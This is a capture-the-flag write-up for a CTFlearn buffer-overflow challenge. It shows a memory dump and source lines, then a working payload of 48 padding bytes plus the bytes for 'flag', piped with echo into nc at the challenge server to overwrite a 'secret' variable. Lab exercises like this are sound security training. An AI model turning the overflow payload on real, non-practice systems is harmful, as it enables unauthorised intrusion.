RIP my bof: https://ctflearn.com/challenge/1011
Category: Binary
Solution #1:

After calling "nc thekidofarcrania.com 35235" we can see a buffer overflow task.

Legend: buff MODIFIED padding MODIFIED
  notsecret MODIFIED secret MODIFIED CORRECT secret
0xff98e818 | 00 00 00 00 00 00 00 00 |
0xff98e820 | 00 00 00 00 00 00 00 00 |
0xff98e828 | 00 00 00 00 00 00 00 00 |
0xff98e830 | 00 00 00 00 00 00 00 00 |
0xff98e838 | ff ff ff ff ff ff ff ff |
0xff98e840 | ff ff ff ff ff ff ff ff |
0xff98e848 | ef be ad de 00 ff ff ff |
0xff98e850 | c0 55 72 f7 84 5f 57 56 |
0xff98e858 | 68 e8 98 ff 11 3b 57 56 |
0xff98e860 | 80 e8 98 ff 00 00 00 00 |
...

Also we can read source bof.c. Interesting lines:

...
int secret = 0xdeadbeef;
...
if (secret == 0x67616c66) {
    puts("You did it! Congratuations!");
    print_flag(); // Print out the flag. You deserve it.
    return;
}

Seems like we need to replace 0xdeadbeef to 0x67616c66

1) So we generate payload with 48 dummy "\x41" and  "\x66\x6c\x61\x67"
2) Then execute "echo -e "\x41...\x41\x66\x6c\x61\x67\x00\xff\xff\xff" | nc thekidofarcrania.com 35235